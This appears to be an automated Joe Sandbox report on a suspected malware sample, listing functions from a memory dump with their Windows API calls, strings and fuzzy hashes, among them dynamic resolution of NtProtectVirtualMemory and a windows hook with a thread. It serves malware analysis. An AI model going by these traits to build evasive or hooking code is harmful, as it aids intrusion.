Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 4f626de45a17940fb166dc8d7f4902faaa959b815c2a7e9f55a3834dbd6b4adc
Instruction ID: 7f2d7214b92c7b89cc2bb7f1243cc25699145942d73397cc7a66f89f5feb63bc
Opcode Fuzzy Hash: 4f626de45a17940fb166dc8d7f4902faaa959b815c2a7e9f55a3834dbd6b4adc
Instruction Fuzzy Hash: E001F270708208ABFB11BAA48DD2F5E369CDF49728F51C560F504E66D4E7F8BE10866C

Uniqueness

Uniqueness Score: -1.00%

Function 04152570 Relevance: 7.5, APIs: 5, Instructions: 25synchronizationthreadCOMMON

Download Yara Rule

APIs

UnhookWindowsHookEx.USER32(00000000), ref: 0415257F
SetEvent.KERNEL32(00000000,04154D8A), ref: 0415259A
GetCurrentThreadId.KERNEL32 ref: 0415259F
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,04154D8A), ref: 041525B4
CloseHandle.KERNEL32(00000000,00000000,04154D8A), ref: 041525BF

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
String ID:
API String ID: 2429646606-0
Opcode ID: 39183055557482d68f94f590328f423d8b6b3942f5c94021ac7522f652833c6a
Instruction ID: 0f6d55e2636c432fcc65aec458bc777f84d038ad89be2020d51524d9fe4208f3
Opcode Fuzzy Hash: 39183055557482d68f94f590328f423d8b6b3942f5c94021ac7522f652833c6a
Instruction Fuzzy Hash: BBF0F2715002C09FD718EBAAE8CAA8633F5EB04684B049964E428C3190CBBABC98CF11

Uniqueness

Uniqueness Score: -1.00%

Function 0410BC00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,0410BDD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0410BC2F

Part of subcall function 0410B8C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0410B8E2

Strings

eeee, xrefs: 0410BD3E
ggg, xrefs: 0410BD15
yyyy, xrefs: 0410BD25

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: 851104337b367ed8bdeeb246f8de9edcb6ffdd19f42d50b37cafafdd88011ff7
Instruction ID: f65302bfc08f1377708c5d4cdc460d0955cf2c65ed5c31793f2daeda54877f5d
Opcode Fuzzy Hash: 851104337b367ed8bdeeb246f8de9edcb6ffdd19f42d50b37cafafdd88011ff7
Instruction Fuzzy Hash: 2541313070C1058BF701EAE88AD02BEF2AADB8520CB14C065D562D73C4EBF4FD069765

Uniqueness

Uniqueness Score: -1.00%

Function 04133498 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 041334E6
SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 04133538
DrawMenuBar.USER32(00000000), ref: 04133545

Strings

P, xrefs: 041334D8

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: P
API String ID: 3227129158-3110715001
Opcode ID: 720aa4310928510092f1424f500b4a4cb0198235fd618298716da295b09d7eb0
Instruction ID: 8f6cc05786251ff7d01272ba84fcc458ac2b7f839b63266c3611a6b9f3dcca91
Opcode Fuzzy Hash: 720aa4310928510092f1424f500b4a4cb0198235fd618298716da295b09d7eb0
Instruction Fuzzy Hash: 6711CE70205204AFE350DB28CCC1B5A7BD9AB84325F14C6A8F4A4DB2D4CB79E884C78A

Uniqueness

Uniqueness Score: -1.00%

Function 0411FC14 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 0411FC21
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0411FC27

Strings

C:\Windows\System32\ntdll.dll, xrefs: 0411FC1C
NtProtectVirtualMemory, xrefs: 0411FC17

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
API String ID: 1646373207-1386159242
Opcode ID: 16b6ebe1ee80a5671a49f496512f5ec6ca3e3c2896e47ca1850d4dc726e241c6
Instruction ID: 0100ad7bb3c4e22e1c6048e6a622113d25337a270d3b08af86c7ec8f240d3ec0
Opcode Fuzzy Hash: 16b6ebe1ee80a5671a49f496512f5ec6ca3e3c2896e47ca1850d4dc726e241c6
Instruction Fuzzy Hash: A8E0B6B6600288AF8B40EF99D9C5E8B3BECAB0C6607404010FA18C7210CB75F9A59B74

Uniqueness

Uniqueness Score: -1.00%

Function 0410D6A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0416910B,00000000,0416911E), ref: 0410D6A6
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0410D6B7

Strings

GetDiskFreeSpaceExA, xrefs: 0410D6B1
kernel32.dll, xrefs: 0410D6A1

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 9ee5cb33549eea8214e9c07b18df207a1124be59dd00b989aa0bac4ed22eb2e9
Instruction ID: c467bc3841ced89dfc8ad080e4e2dad6f2193ad980e072a532be6cddce3c9586
Opcode Fuzzy Hash: 9ee5cb33549eea8214e9c07b18df207a1124be59dd00b989aa0bac4ed22eb2e9
Instruction Fuzzy Hash: 43D05EF0B903448BEB00BAE174C061132E8EB01346B008165A40C761D0C7F8E891CB14

Uniqueness

Uniqueness Score: -1.00%

Function 0413D52C Relevance: 6.3, APIs: 4, Instructions: 308COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,00000000,00000000), ref: 0413D6AB
MulDiv.KERNEL32(?,?,?), ref: 0413D6E6

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0012eed08091de9c277f7deaea2b18a2b251f1d017657b1455f36c520c867250
Instruction ID: 79f05798df603c679825cbd967dbbd52d73b547468320c309f92100fea08e2f9
Opcode Fuzzy Hash: 0012eed08091de9c277f7deaea2b18a2b251f1d017657b1455f36c520c867250
Instruction Fuzzy Hash: CCD156B0A04A099FDB15CFB9D484BAABBF6FF49301F108999E46A9B354D730F941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 041380E0 Relevance: 6.2, APIs: 4, Instructions: 212COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 04138155
GetDesktopWindow.USER32 ref: 04138285
SetCursor.USER32(00000000), ref: 041382DA

Part of subcall function 04143C30: ImageList_EndDrag.COMCTL32(?,-00000010,041382B5), ref: 04143C4C

SetCursor.USER32(00000000), ref: 041382C5

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CursorDesktopWindow$DragImageList_
String ID:
API String ID: 617806055-0
Opcode ID: e15433f3c7a94766953e2ebe3f900d591bfa3c28db72b0bd9f008d7dbc799dac
Instruction ID: 1733eeb5f9b09a257afbd16e470892da49db3cab19afdcff91489e3925661289
Opcode Fuzzy Hash: e15433f3c7a94766953e2ebe3f900d591bfa3c28db72b0bd9f008d7dbc799dac
Instruction Fuzzy Hash: 17914635600281CFD704EF2AE6C8A197BE1EF99385F198594E8448B365CB78FCC9DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0410F554 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0410F603
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0410F61F
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0410F696
VariantClear.OLEAUT32(?), ref: 0410F6BF

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: 6555b048f57d024e691f0ccf5a6430638080860cc38302a9c750aceba7426496
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: 8C412875A0121D8FDB61EF58C8D1BC9B3BCAB48214F0085D5E548E7291DBB0BF818F54

Uniqueness

Uniqueness Score: -1.00%

Function 0410BE3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0410BE59
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0410BE7D
GetModuleFileNameA.KERNEL32(04100000,?,00000105), ref: 0410BE98
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0410BF2E

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 438732681ef416c001306c7b6bb8e3c4f3753c534d78a1c4282c1cf3f5ce76fd
Instruction ID: db59d91fba965899371e255e89ad2312cc4eda2744020b7bdec23fe6e3a777a9
Opcode Fuzzy Hash: 438732681ef416c001306c7b6bb8e3c4f3753c534d78a1c4282c1cf3f5ce76fd
Instruction Fuzzy Hash: 09410D70A142589BEB21DBA8CDC4BDAB7F89B08304F4080E5E548E7291DBB4BF848F54

Uniqueness

Uniqueness Score: -1.00%

Function 0410BE3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0410BE59
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0410BE7D
GetModuleFileNameA.KERNEL32(04100000,?,00000105), ref: 0410BE98
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0410BF2E

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: fd27646b8da209db1e039acaaa56b95fe182262ca08ec8698e22544b84403591
Instruction ID: a944b5e8e41b605b38aa8b2e0c68a25e1ea82802724fcfa11a1888d113c38571
Opcode Fuzzy Hash: fd27646b8da209db1e039acaaa56b95fe182262ca08ec8698e22544b84403591
Instruction Fuzzy Hash: 8B41ED70A142589BEB21DBA8CDC4BDAB7ED9B08304F4480E5E548E7295DBB4BF848F54

Uniqueness

Uniqueness Score: -1.00%

Function 04151538 Relevance: 6.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32(00000000), ref: 0415157D
GetDC.USER32(00000000), ref: 041515D2
GetDeviceCaps.GDI32(00000000,0000005A), ref: 041515DC
ReleaseDC.USER32(00000000,00000000), ref: 041515E7

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CapsDeviceKeyboardLayoutRelease
String ID:
API String ID: 3331096196-0
Opcode ID: 37b72b6612c1d07c5484780482f38320963ab199f49aaad4b829fc826973777f
Instruction ID: ed8a95c9b67e21f88c23a7a204cf7485f223a8c2ccdb1d53f8d84f43d3960971
Opcode Fuzzy Hash: 37b72b6612c1d07c5484780482f38320963ab199f49aaad4b829fc826973777f
Instruction Fuzzy Hash: 3D311C70A00250AFE751EF6DD9C4B897BE1FB04218F0581AAEC28CF3A1D776AC44CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04124CBC Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 04122E8C: EnterCriticalSection.KERNEL32(0419A3A0,00000000,0412183E,00000000,0412189D), ref: 04122E94
Part of subcall function 04122E8C: LeaveCriticalSection.KERNEL32(0419A3A0,0419A3A0,00000000,0412183E,00000000,0412189D), ref: 04122EA1
Part of subcall function 04122E8C: EnterCriticalSection.KERNEL32(00000038,0419A3A0,0419A3A0,00000000,0412183E,00000000,0412189D), ref: 04122EAA

Part of subcall function 0412614C: GetDC.USER32(00000000), ref: 041261A2
Part of subcall function 0412614C: GetDeviceCaps.GDI32(00000000,0000000C), ref: 041261B7
Part of subcall function 0412614C: GetDeviceCaps.GDI32(00000000,0000000E), ref: 041261C1
Part of subcall function 0412614C: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,04124D0F,00000000,04124D9B), ref: 041261E5
Part of subcall function 0412614C: ReleaseDC.USER32(00000000,00000000), ref: 041261F0

CreateCompatibleDC.GDI32(00000000), ref: 04124D11
SelectObject.GDI32(00000000,?), ref: 04124D2A
SelectPalette.GDI32(00000000,?,000000FF), ref: 04124D53
RealizePalette.GDI32(00000000), ref: 04124D5F

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
String ID:
API String ID: 979337279-0
Opcode ID: 8f40bc717fd128c6f02dcbaa2d826009d05793c6e5ac68e34e88bf9e13efd425
Instruction ID: 84c25903d88343bbcc733549e0d79c3f7a7506c3b57be477c687d0449c159507
Opcode Fuzzy Hash: 8f40bc717fd128c6f02dcbaa2d826009d05793c6e5ac68e34e88bf9e13efd425
Instruction Fuzzy Hash: CC31E234A00628EFE714EB69CAC0E5DB7F5EF48624B2241A1A804EB361D730FE50EB50

Uniqueness

Uniqueness Score: -1.00%

Function 04133B5C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetMenuState.USER32(?,?,?), ref: 04133B7F
GetSubMenu.USER32(?,?), ref: 04133B8A
GetMenuItemID.USER32(?,?), ref: 04133BA3
GetMenuStringA.USER32(?,?,?,?,?), ref: 04133BF6

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Menu$ItemStateString
String ID:
API String ID: 306270399-0
Opcode ID: fb3a58c3da9fc6d7ae6682bba016efb31c07ea6290ae3b7c05858ba206872267
Instruction ID: b73c23a5237ebab1524608893eb4299231fb9ac52f5368120eba49cad0f61735
Opcode Fuzzy Hash: fb3a58c3da9fc6d7ae6682bba016efb31c07ea6290ae3b7c05858ba206872267
Instruction Fuzzy Hash: E611AF31200208AFEB04EE6CCCC0DAF77E89F49255B1081A9FC28C7294D770FD0193A4

Uniqueness

Uniqueness Score: -1.00%

Function 0411D6E2 Relevance: 6.1, APIs: 4, Instructions: 70threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0411D6EF
GetCurrentThreadId.KERNEL32 ref: 0411D6FE
EnterCriticalSection.KERNEL32(0419A2EC), ref: 0411D743
InterlockedExchange.KERNEL32(0416AAF0,?), ref: 0411D75F

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CurrentThread$CriticalEnterExchangeInterlockedSection
String ID:
API String ID: 2380408948-0
Opcode ID: 4a61ad2deda2213b2c2a496798471d81e496fc6ebd0a01edd18a742f8bab4464
Instruction ID: 33c7c3fa9d09591039f4e4a50ebdd92fa7e7ff9aff2d038eb57a391b6d0c3b3c
Opcode Fuzzy Hash: 4a61ad2deda2213b2c2a496798471d81e496fc6ebd0a01edd18a742f8bab4464
Instruction Fuzzy Hash: 8F21A430B04244EFE714EBA8E8C1B6AB7F8EB05318F51C4B4E405D22A0E7B5BD54CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04152D14 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

EnumWindows.USER32(Function_00052CA4), ref: 04152D49
GetWindow.USER32(00000003,00000003), ref: 04152D61
GetWindowLongA.USER32(00000000,000000EC), ref: 04152D6E
SetWindowPos.USER32(00000000,00000213,00000000,00000000,00000000,00000000,00000213,00000000,000000EC,00000003,00000003), ref: 04152DAD

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Window$EnumLongWindows
String ID:
API String ID: 4191631535-0
Opcode ID: 3d5efa744b10f355a672a6ac320ff96b8dc6002b9249a4e08afcdfeca9db9dbd
Instruction ID: 4329039c98bbf2ca83eb234273f71110ef76ed3d6868ad9b25b99b4c0355aac1
Opcode Fuzzy Hash: 3d5efa744b10f355a672a6ac320ff96b8dc6002b9249a4e08afcdfeca9db9dbd
Instruction Fuzzy Hash: 2E112E316046109FEB10AA68CCC5FD57794EF05724F1542A4FDA8AB2E6C3B0AC40CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0413A024 Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?), ref: 0413A039
MulDiv.KERNEL32(?), ref: 0413A056
MulDiv.KERNEL32(?), ref: 0413A073
MulDiv.KERNEL32(?), ref: 0413A090

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 252c6770106a75361df70907076199b145203d4218c02a64cf2bf0741655b85d
Instruction ID: a202c795c5741c9538a0e0c482dda0bc96df2b35efb2d1378c432e1a3afc65c2
Opcode Fuzzy Hash: 252c6770106a75361df70907076199b145203d4218c02a64cf2bf0741655b85d
Instruction Fuzzy Hash: 3101FB2070425C6FA774BE2A5CC4F5B7E9DDFC5795B008078782D8B346EBA5FC1582A8

Uniqueness

Uniqueness Score: -1.00%

Function 04137F28 Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 04137F35
GetCurrentProcessId.KERNEL32(00000000,?,?,-00000010,00000000,04137FA0,-000000F7,?,00000000,04137B5A,?,-00000010,?), ref: 04137F3E
GlobalFindAtomA.KERNEL32(00000000), ref: 04137F53
GetPropA.USER32(00000000,00000000), ref: 04137F6A

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Process$AtomCurrentFindGlobalPropThreadWindow
String ID:
API String ID: 2582817389-0
Opcode ID: d7e27c0d3e9885d1be2a2595ba35f4ac1b58d464aa453354d082914b685cd7ef
Instruction ID: 6b8213b4c6d50e21c52f0abe183f829683a14049f110bef7addf5d465c474eb4
Opcode Fuzzy Hash: d7e27c0d3e9885d1be2a2595ba35f4ac1b58d464aa453354d082914b685cd7ef
Instruction Fuzzy Hash: 16F0A0B1A0213277A6207BA69EC087F199CAE0079A705C161FD60C20D0DB18FD8151B5

Uniqueness

Uniqueness Score: -1.00%

Function 04136FC8 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?), ref: 04136FD5
GetCurrentProcessId.KERNEL32(?,00000000,?,04133C39,?,04132CF5), ref: 04136FDE
GlobalFindAtomA.KERNEL32(00000000), ref: 04136FF3
GetPropA.USER32(?,00000000), ref: 0413700A

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Process$AtomCurrentFindGlobalPropThreadWindow
String ID:
API String ID: 2582817389-0
Opcode ID: 6551f2ce029fe679928a3614183918c6a6ac361aecc1c4af92a9ba1c417a6d33
Instruction ID: ea766a0b90e031267e0d38c8bca6150e20ab4e385a5ab194979e96dd15deee00
Opcode Fuzzy Hash: 6551f2ce029fe679928a3614183918c6a6ac361aecc1c4af92a9ba1c417a6d33
Instruction Fuzzy Hash: 71F0A0B9B00190A6EB30BBF56CC082B26DC8A056A63008861FE10C71C1DB65FC4092B0

Uniqueness

Uniqueness Score: -1.00%

Function 041524FC Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 04152514
SetWindowsHookExA.USER32(00000003,041524B8,00000000,00000000), ref: 04152524
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0415253F
CreateThread.KERNEL32(00000000,000003E8,0415245C,00000000,00000000), ref: 04152563

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CreateThread$CurrentEventHookWindows
String ID:
API String ID: 1195359707-0
Opcode ID: 36579eb908b4612483d9e0b575ed2057a98aaabc1e9f27d311cf5ddc25fbb25e
